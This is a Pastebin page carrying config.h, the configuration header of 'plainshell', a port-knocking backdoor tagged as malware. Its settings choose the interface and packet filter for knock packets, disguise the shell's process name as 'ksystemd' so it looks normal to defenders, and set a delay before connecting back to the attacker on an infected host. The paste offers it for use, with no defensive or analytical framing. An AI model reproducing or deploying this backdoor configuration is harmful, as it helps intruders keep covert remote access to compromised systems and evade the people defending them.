API tools faq
paste
Advertisement
FlyFar

config.h

FlyFar
Jan 20th, 2024
542
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.16 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2.  * config.h
  3.  * Config for plainshell
  4.  * By J. Stuart McMurray
  5.  * Created 20160319
  6.  * Last Modified 20160319
  7.  */
  8.  
  9. #ifndef HAVE_CONFIG_H   /* Don't touch this */
  10. #define HAVE_CONFIG_H 1 /* Or this */
  11.  
  12. /* Device on which to listen for knock packets.  On linux, this can be "any"
  13.  * to listen on all interfaces. */
  14. #define DEVICE "lo0"
  15.  
  16. /* Only packets matching this filter will be used.  This should be set as
  17.  * restrictive as possible to avoid unintended packets being used. */
  18. #define FILTER "udp and dst port 53 and src port 31337"
  19.  
  20. /* Name for the shell in the process list.  This should look normal to a
  21.  * defender. */
  22. #define SHNAME "ksystemd"
  23.  
  24. /* Time to wait between getting a knock packet and connecting back to the
  25.  * attacker.  This may help make correlation a little harder, as well as
  26.  * make it easier to have a one-line knock-then-listen command. */
  27. #define WAITTM 2
  28.  
  29. /* Flag on the command line to tell Plainshell to make a knock packet body, and
  30.  * not be a backdoor.  This can be changed to avoid clashing with whatever is
  31.  * used on the infected host. */
  32. #define KNOCKFLAG "--k"
  33.  
  34. #endif /* HAVE_CONFIG_H */ /* Don't touch this. */
Tags: malware Backdoor
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!